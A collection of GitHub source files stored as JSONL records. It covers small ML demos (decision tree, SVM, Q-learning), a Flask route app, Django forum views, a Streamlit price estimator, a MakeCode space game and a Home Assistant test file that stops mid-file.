+{"seq_id":"14300387890","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 25 20:45:59 2021\n\n@author: RISHBANS\n\"\"\"\n\nimport pandas as pd\ntennis_data = pd.read_csv(\"tennis.csv\")\n\nfrom sklearn.preprocessing import OrdinalEncoder\nfrom sklearn.tree import DecisionTreeClassifier\n\no_e = OrdinalEncoder()\nX = tennis_data.drop(columns=['play'])\ny = tennis_data.play\n\nX = o_e.fit_transform(X)\n\ndt = DecisionTreeClassifier(criterion='entropy')\ndt.fit(X, y)\nprint(o_e.categories_)\n\ndt.predict([[1,0,1,0]])\n\n","repo_name":"edyoda/ML-with-Rishi","sub_path":"dt_tennis.py","file_name":"dt_tennis.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"36"}
+{"seq_id":"32881100298","text":"# -*- coding: utf-8 -*-\n# Reporter: Send data email to recver.\n\nfrom module.mail.mail import Sender\nfrom module.database.db_opter import DBController\nfrom module.config.reporter import RPTerConfigReader\nfrom util.xlsx.writer import write_xlsx\nfrom util.common.date import Time\n\nimport os\nimport shutil\n\nclass Do():\n\n def __init__(self, rpt_name):\n self.rpt_name = rpt_name\n self.rpt_conf = RPTerConfigReader.rpter_config(rpt_name)\n self.db = DBController(rpt_name)\n\n def do(self):\n lj_path = self.data_from_db_lj\n qk_path = self.data_from_db_qk\n dk_path = self.data_from_db_dk\n zr_path = self.data_from_db_zr\n\n self.sender = Sender(\n msg = \"%s\\n数据采样时间:%s\"%(self.rpt_conf['recv']['recv_msg'], Time.now_date_str()),\n subject = \"%s => %s\"%(self.rpt_conf['recv']['recv_sub'], Time.now_date_str()),\n recvers = self.rpt_conf['recv']['recv_mail']\n )\n\n self.sender.add_attachment(*lj_path)\n self.sender.add_attachment(*qk_path)\n self.sender.add_attachment(*dk_path)\n self.sender.add_attachment(*zr_path)\n\n self.sender.send()\n\n\n def __data_from_db__(self, SQL, filename, sheetname, orderlist):\n RPT_PATH = \"./_output/{rpt}\".format(\n rpt = self.rpt_name\n )\n XLSX_PATH = \"{rpt}/{date}\".format(\n rpt = RPT_PATH,\n date = Time.now_date_str()\n )\n\n if not os.path.exists(RPT_PATH):\n os.mkdir(RPT_PATH)\n\n if not os.path.exists(XLSX_PATH):\n os.mkdir(XLSX_PATH)\n\n path = \"{xlsx}/{filename}.xlsx\".format(\n xlsx = XLSX_PATH,\n filename = sheetname\n )\n\n if os.path.exists(path):\n os.remove(path)\n\n self.db.execute(SQL)\n data = self.db.cur.fetchall()\n \n with write_xlsx(path, sheetname) as x:\n for d in data:\n x.write_dict(d, orderlist=orderlist)\n return filename, path\n\n @property\n def data_from_db_lj(self):\n '''data_from_db_lj\n Get Lianjia house info data from database.\n '''\n SQL = \"\"\"\n select\n h.house_id as '房源编号', h.community_id as '小区编号',\n h.house_type_new as '房型', h.house_area as '房屋面积',\n h.house_price as '租金', c.community_name as '小区名称',\n c.bd_district as '行政区', c.bd_busi as '商圈', \n c.bd_detail as '详细地址'\n from\n house_base_infolj h\n inner join community_info c on \n h.community_id = c.community_id and c.source_from = 1 and h.enabled = 1 \n and c.enabled = 1 and c.community_id <> '' and c.lat <> '' and c.lng <> '' \n \"\"\"\n sheetname = '链家信息采集'\n filename = 'LianjiaHouseInfo.xlsx'\n orderlist = [\n '房源编号', '小区编号', '房型', '房屋面积', '租金', '小区名称', '行政区', '商圈', '详细地址'\n ]\n return self.__data_from_db__(SQL, filename, sheetname, orderlist)\n\n\n @property\n def data_from_db_qk(self):\n '''data_from_db_qk\n Get Qingke house info data from database.\n '''\n SQL = \"\"\"\n select\n h.house_id as '房源编号', h.community_id as '小区编号', '' as '房型',\n h.area as '房屋面积', h.price as '租金', c.community_name as '小区名称',\n c.bd_district as '行政区', c.bd_busi as '商圈', c.bd_detail as '详细地址'\n from\n house_base_infoqk h\n inner join community_info c on \n h.community_id = c.community_id and c.source_from = 3 and \n h.enabled = 1 \n and c.enabled = 1 and c.community_id <> '' and c.lat <> '' and c.lng <> '' \n \"\"\"\n sheetname = '青客信息采集'\n filename = 'QingkeHouseInfo.xlsx'\n orderlist = [\n '房源编号', '小区编号', '房型', '房屋面积', '租金', '小区名称', '行政区', '商圈', '详细地址'\n ]\n return self.__data_from_db__(SQL, filename, sheetname, orderlist)\n\n @property\n def data_from_db_dk(self):\n '''data_from_db_dk\n Get Danke house info data from database.\n '''\n SQL = \"\"\"\n select\n h.house_id as '房源编号', h.community_id as '小区编号',\n h.house_type as '房型', h.area as '房屋面积',\n h.price as '租金', c.community_name as '小区名称',\n c.bd_district as '行政区', c.bd_busi as '商圈', \n c.bd_detail as '详细地址'\n from\n house_base_infodk h\n inner join community_info c on \n h.community_id = c.community_id and c.source_from = 4 and h.enabled = 1 \n and c.enabled = 1 and c.community_id <> '' and c.lat <> '' and c.lng <> '' \n \"\"\"\n sheetname = '蛋壳信息采集'\n filename = 'DankeHouseInfo.xlsx'\n orderlist = [\n '房源编号', '小区编号', '房型', '房屋面积', '租金', '小区名称', '行政区', '商圈', '详细地址'\n ]\n return self.__data_from_db__(SQL, filename, sheetname, orderlist)\n\n @property\n def data_from_db_zr(self):\n '''data_from_db_zr\n Get Ziroom house info data from database.\n '''\n SQL = \"\"\"\n select\n h.house_id as '房源编号', h.community_id as '小区编号', h.house_type as '房型',\n h.area as '房屋面积', h.price as '租金', c.community_name as '小区名称', \n c.bd_district as '行政区', c.bd_busi as '商圈', c.bd_detail as '详细地址'\n from\n house_base_infozr h\n inner join community_info c on \n h.community_id = c.community_id and c.source_from = 2 and h.enabled = 1 \n and c.enabled = 1 and c.community_id <> '' and c.lat <> '' and c.lng <> ''\n and h.house_id <> ''\n \"\"\"\n sheetname = '自如信息采集'\n filename = 'ZiroomHouseInfo.xlsx'\n orderlist = [\n '房源编号', '小区编号', '房型', '房屋面积', '租金', '小区名称', '行政区', '商圈', '详细地址'\n ]\n return self.__data_from_db__(SQL, filename, sheetname, orderlist)","repo_name":"TauWu/template_crawler","sub_path":"do/reporter.py","file_name":"reporter.py","file_ext":"py","file_size_in_byte":6544,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"36"}
+{"seq_id":"74365883622","text":"import data_frame_cli as cli\nimport pandas as pd\nimport numpy as np\n\ndef test_print_shape(capsys):\n\n expected_out = ['df.shape', 'test.csv', '(5, 2)']\n\n cli.print_shape('test.csv', pd.DataFrame(np.random.randn(5, 2)))\n captured = capsys.readouterr()\n result = captured.out\n\n for element in expected_out:\n assert element in result\n\ndef test_print_info(capsys):\n\n expected_out = ['df.info', '5 non-null', 'int']\n\n cli.print_info(True, pd.DataFrame(np.random.randint(0, 10, size=(5, 2)),\n columns=['col_a', 'col_b']))\n captured = capsys.readouterr()\n result = captured.out\n\n for element in expected_out:\n assert element in result\n\ndef test_print_head(capsys):\n\n expected_out = ['df.head', '10', '40']\n\n cli.print_head(True, pd.DataFrame(data=[[10, 20], [30, 40]], \n columns=['col_a', 'col_b']))\n captured = capsys.readouterr()\n result = captured.out\n\n for element in expected_out:\n assert element in result\n\ndef test_print_describe_none_column(capsys):\n\n expected_out = ['describe', 'bla not found']\n\n cli.print_describe('bla', pd.DataFrame(data=[[10, 20], [30, 40]], \n columns=['col_a', 'col_b']))\n captured = capsys.readouterr()\n result = captured.out\n\n for element in expected_out:\n assert element in result","repo_name":"ryanwbaker/ensf311-a3-data-frame-cli","sub_path":"data_frame_cli_test.py","file_name":"data_frame_cli_test.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"1189954750","text":"from __future__ import annotations\n\nimport pandas as pd\nimport streamlit as st\n\nfrom helpers import Data, Model, Scraper\n\nst.set_page_config(page_title='Real estate price estimation')\n\nst.write('Find out what a place would be worth?')\n\n# Setting up the session_state variables\nif 'scraper' not in st.session_state:\n st.session_state['scraper'] = Scraper()\n\nif 'model' not in st.session_state:\n st.session_state['model'] = Model.load_lgbm_pricing_model()\n\nscraper = st.session_state['scraper']\n\n# Searching for the desired place\nst.text_input(label='', value='78 avenue Raymond Poincaré', key='place')\nscraper.type_search(st.session_state['place'])\nscraper.search_place_with_url(scraper.get_suggestions()[0])\n\n# Retrieving the coordinates of the desired place\nlatitude, longitude = scraper.get_coordinates()\n\n# Load the data\nif 'df' not in st.session_state:\n # st.session_state['df'] = Data.load_df(explode=False)\n st.session_state['df'] = Data.load_data_for_lgbm()\n\n# Calculating the distance\ndf_distance = st.session_state['df'].pipe(Data.calculate_distance, latitude=latitude, longitude=longitude)\nmodel_data = df_distance.loc[[df_distance['distance'].argmin()], :].head(1).reset_index(drop=True)\n\n\ncolumns = st.columns(3)\n# Adding a metric with the price predictions for now\nwith columns[0]:\n current_price = st.session_state['model'].predict(model_data)[0]\n st.metric(label='Current price',\n value=f\"{current_price:,.{2}f} €\")\n# Adding a metric with the price predictions for in five years\nwith columns[1]:\n model_data_in_five_years = model_data.copy()\n model_data_in_five_years.loc[0, 'anneemut'] += 5\n price_in_five_years = st.session_state['model'].predict(model_data_in_five_years)[0]\n st.metric(label='Price in five years',\n value=f\"{price_in_five_years:,.{2}f} €\",\n delta=f'{(((price_in_five_years / current_price) - 1) * 100):,.{2}f} %')\n# Adding a metric with the money amount that could be expected if one invested current_price in an ECB bond\nwith columns[2]:\n ecb_five_year_equivalent = current_price * (1.02312) ** 5\n st.metric(label='ECB bond equivalent',\n value=f\"{ecb_five_year_equivalent:,.{2}f} €\",\n delta=f'{(((ecb_five_year_equivalent / current_price) - 1) * 100):,.{2}f} %')\n\n# Drawing the map\nst.map(pd.DataFrame({'lat': [latitude], 'lon': [longitude]}))\n","repo_name":"acktan/eleven-strategy","sub_path":"paris_pricer/Home.py","file_name":"Home.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"6621904027","text":"from flask import Flask,render_template,request,jsonify\nimport random\nfrom dicionario import conveersao,dividir_distancias,dic\nfrom tempera import iniciarr\nfrom subidaencosta import iniciar\nfrom subidaencosta2 import iniciars\nfrom ag_pcv import ag\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n \n return render_template(\"index.html\")\n\n@app.route(\"/\", methods=['POST'])\ndef post():\n #barrinha = request.form['barrinha']\n #print(barrinha)\n tp = request.form['tp']\n ng = request.form['ng']\n tc = request.form['tc']\n tm = request.form['tm']\n ig = request.form['ig']\n distanciaentre = request.form['distanciasi']\n nomes = request.form['nome']\n latitude = request.form['latitudelongitude']\n \n \n nome,numero,latitudee = conveersao(distanciaentre,nomes,latitude)\n\n n = dividir_distancias(numero)\n print(len(n))\n sequencia_atual = list(range(len(n)))\n random.shuffle(sequencia_atual)\n #cursoencosta,distanciaencosta,lat = iniciar(n,nome,latitudee,sequencia_atual)\n #cursoencosta2,distanciaencosta2,lat2 = iniciars(n,nome,latitudee,sequencia_atual)\n #cursotempera,distanciatempera,lon = iniciarr(n,nome,latitudee,sequencia_atual)\n p,lat = ag(n,len(n),int(tp),int(ng),float(tc),float(tm),float(ig),latitudee)\n print(p)\n print(lat)\n #for i in range(len(lat)):\n # muda = lat[i].replace(\",\",\"/\")\n # lat[i] = muda\n #for i in range(len(lon)):\n # muda = lon[i].replace(\",\",\"/\")\n # lon[i] = muda\n #for i in range(len(lat2)):\n # muda = lat2[i].replace(\",\",\"/\")\n # lat2[i] = muda\n \n return render_template(\"index.html\",distanciaencosta = p,lat=lat)\n #if barrinha==\"se\":\n # return render_template(\"index.html\",distanciaencosta =\"\\n Distancia Subida de Encosta:\"+str(distanciaencosta),cursoencosta =\"Curso Subida de encosta:\" +str(cursoencosta),lat=lat)\n #elif barrinha == \"se*\":\n # return render_template(\"index.html\",distanciaencosta2 =\"\\n Distancia Subida de Encosta*:\"+str(distanciaencosta2),cursoencosta2 =\"Curso Subida de encosta*:\" +str(cursoencosta2),lat2=lat2)\n #elif barrinha ==\"temp\":\n # return render_template(\"index.html\", distanciatempera = \"\\n Distancia Tempera:\"+str(distanciatempera),cursotempera =\"\\n Curso Tempera:\"+str(cursotempera),long = lon)\n #elif barrinha ==\"todas\":\n # return render_template(\"index.html\",distanciaencosta =\"\\n Distancia Subida de Encosta:\"+str(distanciaencosta),cursoencosta =\"Curso Subida de encosta:\" +str(cursoencosta),lat=lat,cursotempera = \"\\n Curso Tempera:\"+str(cursotempera),distanciatempera=\"\\n Distancia tempera:\"+str(distanciatempera),long = lon,distanciaencosta2 =\"\\n Distancia Subida de Encosta*:\"+str(distanciaencosta2),cursoencosta2 =\"Curso Subida de encosta*:\" +str(cursoencosta2),lat2=lat2)\n\n \n \nif __name__ == \"__main__\":\n app.run()\n\n\n\n\n","repo_name":"Igao2/BarRoute","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"36516820753","text":"import logging\n\nimport sbs.database_utility as db_util\nfrom sbs.models.TxMethod import TxMethod\nfrom sbs.utility import log_level\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(log_level)\n\n\ndef add_tx_method(params):\n \"\"\"\n Adds tx_method record or returns tx_method record if already exists\n \"\"\"\n method_name = params['tx_method']\n try:\n tx_method = TxMethod.query.filter_by(method_name=method_name) \\\n .one_or_none()\n\n if tx_method:\n logger.info(\"TxMethod with method name [{}] already exists.\"\n .format(method_name))\n return tx_method\n\n tx_method = TxMethod(method_name)\n db_util.db_add_query(tx_method)\n db_util.db_commit()\n logger.info(\"Transformation method record for method {} added successfully.\"\n .format(method_name))\n tx_method = TxMethod.query.filter_by(method_name=method_name) \\\n .one_or_none()\n except Exception as e:\n logger.error('An error occurred : {}'.format(str(e)))\n raise Exception('Failed to fetch Transformation method id for method '\n '[{}] with error {} '.format(method_name, e))\n\n return tx_method\n","repo_name":"rohitbs113/DupontSBS","sub_path":"sbs/service/tx_method_service.py","file_name":"tx_method_service.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"2281427634","text":"@namespace\nclass SpriteKind:\n Gas = SpriteKind.create()\n\ndef on_a_pressed():\n global darts, projectile\n darts = [assets.image(\"\"\"\n Dart1\n \"\"\"),\n assets.image(\"\"\"\n Dart2\n \"\"\"),\n img(\"\"\"\n . . 1 1 . . \n . . 1 1 . . \n 5 1 1 1 1 5 \n 5 5 5 5 5 5 \n . . 5 5 . . \n . 5 . . 5 .\n \"\"\"),\n img(\"\"\"\n . . 1 1 . . \n . . 1 1 . . \n 7 1 1 1 1 7 \n 7 7 7 7 7 7 \n . . 7 7 . . \n . 7 . . 7 .\n \"\"\"),\n img(\"\"\"\n . . 1 1 . . \n . . 1 1 . . \n 9 1 1 1 1 9 \n 9 9 9 9 9 9 \n . . 9 9 . . \n . 9 . . 9 .\n \"\"\"),\n img(\"\"\"\n . . 1 1 . . \n . . 1 1 . . \n a 1 1 1 1 a \n a a a a a a \n . . a a . . \n . a . . a .\n \"\"\")]\n projectile = sprites.create_projectile_from_sprite(darts._pick_random(), mySprite, 0, -150)\n projectile.start_effect(effects.warm_radial, 100)\ncontroller.A.on_event(ControllerButtonEvent.PRESSED, on_a_pressed)\n\ndef on_on_overlap(sprite, otherSprite):\n global enemySpeed\n sprite.destroy(effects.disintegrate, 500)\n otherSprite.destroy()\n info.change_score_by(1)\n if info.score() == 5:\n game.show_long_text(\"Ship Intercom: We forgot to tell you, your projectiles steal data from the ships before destroying them. And also, please don't get hit too many times, these ships are really expensive.\",\n DialogLayout.BOTTOM)\n if info.score() == 10:\n info.change_score_by(5)\n mySprite.say_text(\"+5 Level-Up Bonus\", 2000, False)\n statusbar2.value = 100\n enemySpeed = 70\n elif info.score() == 25:\n info.change_score_by(5)\n mySprite.say_text(\"+5 Level-Up Bonus\", 2000, False)\n statusbar2.value = 100\n enemySpeed = 90\n elif info.score() == 40:\n game.show_long_text(\"Congrats soldier, you saved the galaxy. Accept this reward of $700,000,000!\",\n DialogLayout.BOTTOM)\n info.change_score_by(700000000)\n game.over(True)\nsprites.on_overlap(SpriteKind.enemy, SpriteKind.projectile, on_on_overlap)\n\ndef on_on_zero(status):\n game.show_long_text(\"Ship Intercom: Come in soldier... soldier? I TOLD HIM THESE ARE EXPENSIVE AS CRAP.\",\n DialogLayout.BOTTOM)\n game.over(False)\nstatusbars.on_zero(StatusBarKind.health, on_on_zero)\n\ndef on_on_overlap2(sprite2, otherSprite2):\n statusbar.value = 100\n otherSprite2.destroy()\nsprites.on_overlap(SpriteKind.player, SpriteKind.Gas, on_on_overlap2)\n\ndef on_on_zero2(status2):\n game.show_long_text(\"Ship Intercom: *slaps face* You needed to grab the fuel. COME ON!\",\n DialogLayout.BOTTOM)\n game.over(False)\nstatusbars.on_zero(StatusBarKind.energy, on_on_zero2)\n\ndef on_on_overlap3(sprite3, otherSprite3):\n statusbar2.value += -20\n otherSprite3.destroy(effects.fire, 500)\n scene.camera_shake(4, 500)\nsprites.on_overlap(SpriteKind.player, SpriteKind.enemy, on_on_overlap3)\n\nmyEnemy: Sprite = None\nmyFuel: Sprite = None\nprojectile: Sprite = None\ndarts: List[Image] = []\nstatusbar2: StatusBarSprite = None\nenemySpeed = 0\nstatusbar: StatusBarSprite = None\nmySprite: Sprite = None\ngame.splash(\"You feel a strange, cold breeze, and you are suddenly awoken by the President.\")\ngame.show_long_text(\"Mr. President: Hello, you've been selected to fight evil in the galaxy. Complete this mission for the chance to earn $700,000,000.\",\n DialogLayout.BOTTOM)\nscene.set_background_image(assets.image(\"\"\"\n Galaxy\n\"\"\"))\nscroller.scroll_background_with_speed(0, 10)\nmySprite = sprites.create(assets.image(\"\"\"\n Rocket\n\"\"\"), SpriteKind.player)\ncontroller.move_sprite(mySprite)\nmySprite.set_stay_in_screen(True)\nanimation.run_image_animation(mySprite,\n assets.animation(\"\"\"\n Flying Rocket\n \"\"\"),\n 100,\n True)\nstatusbar = statusbars.create(20, 4, StatusBarKind.energy)\nstatusbar.attach_to_sprite(mySprite, -30, 0)\nenemySpeed = 50\nstatusbar2 = statusbars.create(4, 20, StatusBarKind.health)\nstatusbar2.attach_to_sprite(mySprite, 0, 0)\nstatusbar.set_label(\"Gas\")\nstatusbar2.set_label(\"HP\")\n\ndef on_update_interval():\n global myFuel\n myFuel = sprites.create_projectile_from_side(assets.image(\"\"\"\n Fuel\n \"\"\"), 0, 80)\n myFuel.x = randint(5, 155)\n myFuel.set_kind(SpriteKind.Gas)\ngame.on_update_interval(5000, on_update_interval)\n\ndef on_update_interval2():\n global myEnemy\n myEnemy = sprites.create_projectile_from_side(assets.image(\"\"\"\n Spider\n \"\"\"), 0, enemySpeed)\n myEnemy.x = randint(5, 155)\n myEnemy.set_kind(SpriteKind.enemy)\n animation.run_image_animation(myEnemy,\n assets.animation(\"\"\"\n Flying Spider\n \"\"\"),\n 100,\n True)\ngame.on_update_interval(2000, on_update_interval2)\n\ndef on_update_interval3():\n statusbar.value += -1\ngame.on_update_interval(500, on_update_interval3)","repo_name":"pythongamerexe/space-wars","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"23621832376","text":"#!/usr/bin/env python3\n\"\"\" module \"\"\"\nimport numpy as np\n\n\ndef play(env, Q, max_steps=100):\n \"\"\"trained agent play an episode\"\"\"\n env.reset()\n state = 0\n env.render()\n for i in range(max_steps):\n action = np.argmax(Q[state, :])\n state, reward, done, _ = env.step(action)\n env.render()\n if done:\n break\n return reward\n","repo_name":"vandeldiegoc/holbertonschool-machine_learning","sub_path":"reinforcement_learning/0x00-q_learning/4-play.py","file_name":"4-play.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"29543563501","text":"import time\n\n\nsessions = {}\n\n\ndef find_or_create_session(id_):\n \"\"\"\n This function returns the client session with Wit context included if one\n exists, or it returns a newly created session\n\n :param id_: A Facebook ID\n :return: str\n \"\"\"\n new_session = False\n session_id = \"\"\n\n # search the global sessions for the given Facebook ID\n for key in sessions.iterkeys():\n if sessions[key][\"id\"] == id_:\n session_id += key\n\n # if no session exists, let's create one\n if session_id is \"\":\n new_session = True\n # the session is created by taking th current epoch time in seconds,\n # and concatenating the given Facebook ID\n session_id += str(int(time.time())) + id_\n sessions[session_id] = {\n \"id\": id_,\n \"context\": {}\n }\n\n return session_id, new_session\n\n\ndef main():\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"harrylewis/travel-assistant-bot","sub_path":"sessions.py","file_name":"sessions.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"15317573724","text":"from django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_GET, require_POST\n\nfrom glass.forms import UserForm, TopicForm, MessageForm\nfrom glass.models import User, Tag, Topic, Message\n\n@require_GET\ndef index(request):\n \"\"\"\n Index page of the project.\n\n The page presents list of popular topics ordered by default by number of\n “likes”. Pagination, search.\n \"\"\"\n page_size = request.GET.get('page_size', 5)\n page = request.GET.get('page', 1)\n tag = request.GET.get('tag')\n search = request.GET.get('search')\n tm = Topic.objects\n topics = tm.filter(tags__in=[tag]) if tag else tm.all()\n if search:\n topics = topics.filter(title__contains=search)\n # FIXME The following processing logic assumes that relatively small\n # (maybe a few hundreds) number of topics is returned by ‘topic’ query\n # set. This may be *quite* slow if the data base contains lots of\n # topics. If this is the case, we could add ‘initial_message’ foreign\n # key field to ‘Topic’ model and use it to sort topics on data base\n # level. Other solutions would involve lower level of interaction with\n # the data base and thus may lock the application into using of\n # particular back-end, which is often bad design.\n topics = sorted(list(topics),\n key=lambda x: x.initial_message().likes(),\n reverse=True)\n context = {}\n if topics:\n paginator = Paginator(topics, page_size)\n num_pages = paginator.num_pages\n try:\n p = paginator.page(page)\n except PageNotAnInteger:\n contacts = paginator.page(1)\n except EmptyPage:\n p = paginator.page(num_pages)\n context['page'] = p\n # Range of page links to show, we should take care of situations\n # when there are too many pages:\n page_range = range(max(1, p.number - 4),\n min(num_pages, p.number + 4) + 1)\n context['page_range'] = page_range\n context['num_pages'] = num_pages\n else:\n context['page'] = None\n return render(request, 'glass/index.html', context=context)\n\ndef about(request):\n \"\"\"\n About page, nothing special.\n \"\"\"\n return render(request, 'glass/about.html')\n\ndef topic(request, slug):\n \"\"\"\n Topic-dedicated page.\n\n This displays all messages in order and allows registered users to post\n new messages. This page features anchor links per message and ability to\n edit or delete last posted message for its author. Messages can be\n “liked” too and this is reversible.\n \"\"\"\n topic = get_object_or_404(Topic, slug=slug)\n messages = Message.objects.filter(topic=topic)\n context = {'topic': topic,\n 'form': MessageForm(),\n 'messages': messages}\n if request.user.is_authenticated():\n if request.method == 'POST':\n msg_form = MessageForm(request.POST)\n if msg_form.is_valid():\n message = msg_form.save(commit=False)\n message.author = request.user\n message.topic = topic\n message.save()\n msg_form.save_m2m()\n return redirect('topic', slug=slug)\n else:\n context['form'] = msg_form # render errors\n return render(request, 'glass/topic.html', context)\n\n@login_required\ndef new_topic(request):\n \"\"\"\n Creation of new topics.\n\n This is mainly about processing of ‘TopicForm’ and ‘MessageForm’, since\n every topic must have initial message.\n \"\"\"\n if request.method == 'GET':\n context = {'topic_form': TopicForm(prefix='topic'),\n 'msg_form': MessageForm(prefix='msg')}\n elif request.method == 'POST':\n topic_form = TopicForm(request.POST, prefix='topic')\n msg_form = MessageForm(request.POST, prefix='msg')\n context = {'topic_form': topic_form,\n 'msg_form': msg_form}\n if topic_form.is_valid():\n new_topic = topic_form.save()\n if msg_form.is_valid():\n new_msg = msg_form.save(commit=False)\n new_msg.author = request.user\n new_msg.topic = new_topic\n new_msg.save()\n msg_form.save_m2m()\n return redirect('topic', slug=new_topic.slug)\n return render(request, 'glass/new-topic.html', context=context)\n\n@login_required\ndef user(request, username):\n \"\"\"\n User profile.\n\n Every registered user can see all profiles, but only his own profile is\n editable for him. This page also displays latest messages authored by\n the user.\n \"\"\"\n user = get_object_or_404(User, username=username)\n latest_msgs = Message.objects.filter(author=user).order_by('-id')[:5]\n context = {'this_user': user, 'latest_msgs': latest_msgs}\n if request.user == user:\n if request.method == 'GET':\n context['form'] = UserForm(instance=user)\n elif request.method == 'POST':\n form = UserForm(request.POST, instance=user)\n if form.is_valid():\n form.save()\n else: # if form is invalid, render it to show messages\n context['form'] = form\n return render(request, 'glass/user.html', context=context)\n\ndef carefully_get_msg(request):\n \"\"\"\n Return message according to parameters in ‘request’ or ‘None’. Request\n should contain parameter named ‘msg_id’ identifying the message.\n \"\"\"\n user = request.user\n if not user.is_authenticated():\n return None\n msg_id = request.GET.get('msg_id')\n if not msg_id:\n return None\n try:\n msg = Message.objects.get(id=msg_id)\n except Message.DoesNotExist:\n return None\n return msg\n\n@require_GET\ndef msg_like(request):\n \"\"\"\n This is how users can like messages.\n\n Invoked by Java Script from topic page.\n \"\"\"\n msg = carefully_get_msg(request)\n if not msg:\n return HttpResponse('0')\n if msg.likers.filter(username=request.user.username).exists():\n msg.likers.remove(request.user)\n else:\n msg.likers.add(request.user)\n msg.save()\n return HttpResponse(str(msg.likes()))\n\n@require_GET\ndef msg_del(request):\n \"\"\"\n Deletion of message.\n\n Quite obviously, it deletes messages. Only last message in thread can be\n deleted and only by its author. Staff can delete everything, of course.\n \"\"\"\n msg = carefully_get_msg(request)\n topic = msg.topic\n if not msg or not msg.editable_by(request.user):\n return HttpResponse('')\n msg.delete()\n # if this is the single message in topic, delete topic:\n if not Message.objects.filter(topic=topic).exists():\n topic.delete()\n return HttpResponse(\"deleted\")\n","repo_name":"mrkkrp/glass","sub_path":"glass/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"15500299977","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets\nfrom sklearn.preprocessing import PolynomialFeatures, StandardScaler\nfrom sklearn.svm import LinearSVC\nfrom sklearn.pipeline import Pipeline\nfrom LogisticRegression.drawDecisionBoundary import plot_decision_boundary\nfrom sklearn.svm import SVC\n\n\ndef PolynomiaSVC(degree, C=1.0):\n return Pipeline([\n ('poly', PolynomialFeatures(degree=degree)),\n ('std_scaler', StandardScaler()),\n ('linearSVC', LinearSVC(C=C))\n ])\n\ndef PolynomialKernelSVC(degree, C=1.0):\n return Pipeline([\n ('std_scaler', StandardScaler()),\n ('kernelSVC', SVC(kernel='poly', degree=degree, C=C))\n ])\n\nif __name__ == \"__main__\":\n\n # 使用skleran生成数据\n X, y = datasets.make_moons(noise=0.15, random_state=666)\n\n # 绘制数据集图像\n plt.scatter(X[y==0, 0], X[y==0, 1])\n plt.scatter(X[y==1, 0], X[y==1, 1])\n plt.show()\n\n # 使用多项式特征的SVM\n poly_svc = PolynomiaSVC(degree=3)\n poly_svc.fit(X, y)\n\n # 绘制决策边界\n plot_decision_boundary(poly_svc, axis=[-1.5, 2.5, -1.0, 1.5])\n plt.scatter(X[y==0, 0], X[y==0, 1])\n plt.scatter(X[y==1, 0], X[y==1, 1])\n plt.show()\n\n # 使用多项式核函数的SVM\n poly_kernel_svc = PolynomiaSVC(degree=3)\n poly_kernel_svc.fit(X, y)\n\n # 绘制决策边界\n plot_decision_boundary(poly_kernel_svc, axis=[-1.5, 2.5, -1.0, 1.5])\n plt.scatter(X[y==0, 0], X[y==0, 1])\n plt.scatter(X[y==1, 0], X[y==1, 1])\n plt.show()","repo_name":"ediltwwj/MachinelLearning","sub_path":"SVM/sklearnSvm2.py","file_name":"sklearnSvm2.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"9052856933","text":"\"\"\"MasterTherm Sensor Tests.\"\"\"\nfrom unittest.mock import patch\nimport pytest\n\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.const import Platform, UnitOfTemperature\n\nfrom pytest_homeassistant_custom_component.common import MockConfigEntry\nfrom custom_components.mastertherm.const import (\n DOMAIN,\n MasterthermSensorEntityDescription,\n)\n\nfrom .conftest import APIMock\n\n\n@pytest.fixture(autouse=True)\ndef override_entity():\n \"\"\"Override the ENTITIES to test Sensors.\"\"\"\n with patch(\n \"custom_components.mastertherm.ENTITIES\",\n {MasterthermSensorEntityDescription.__name__: Platform.SENSOR},\n ), patch(\n \"custom_components.mastertherm.coordinator.ENTITIES\",\n {MasterthermSensorEntityDescription.__name__: Platform.SENSOR},\n ):\n yield\n\n\nasync def test_sensor_setup(\n hass: HomeAssistant,\n mock_configdata: dict,\n):\n \"\"\"Test Sensors are Created and Updated.\"\"\"\n # Setting up using Mock requires the actual config not the Domain\n # changed the way the test works to send without domain.\n api_mock = APIMock()\n entry = MockConfigEntry(domain=DOMAIN, data=mock_configdata[DOMAIN])\n entry.add_to_hass(hass)\n\n with patch(\n \"custom_components.mastertherm.config_flow.authenticate\",\n return_value={\"status\": \"success\"},\n ), patch(\n \"custom_components.mastertherm.coordinator.MasterthermController.connect\",\n side_effect=api_mock.connect,\n ), patch(\n \"custom_components.mastertherm.coordinator.MasterthermController.refresh\",\n side_effect=api_mock.refresh,\n ), patch(\n 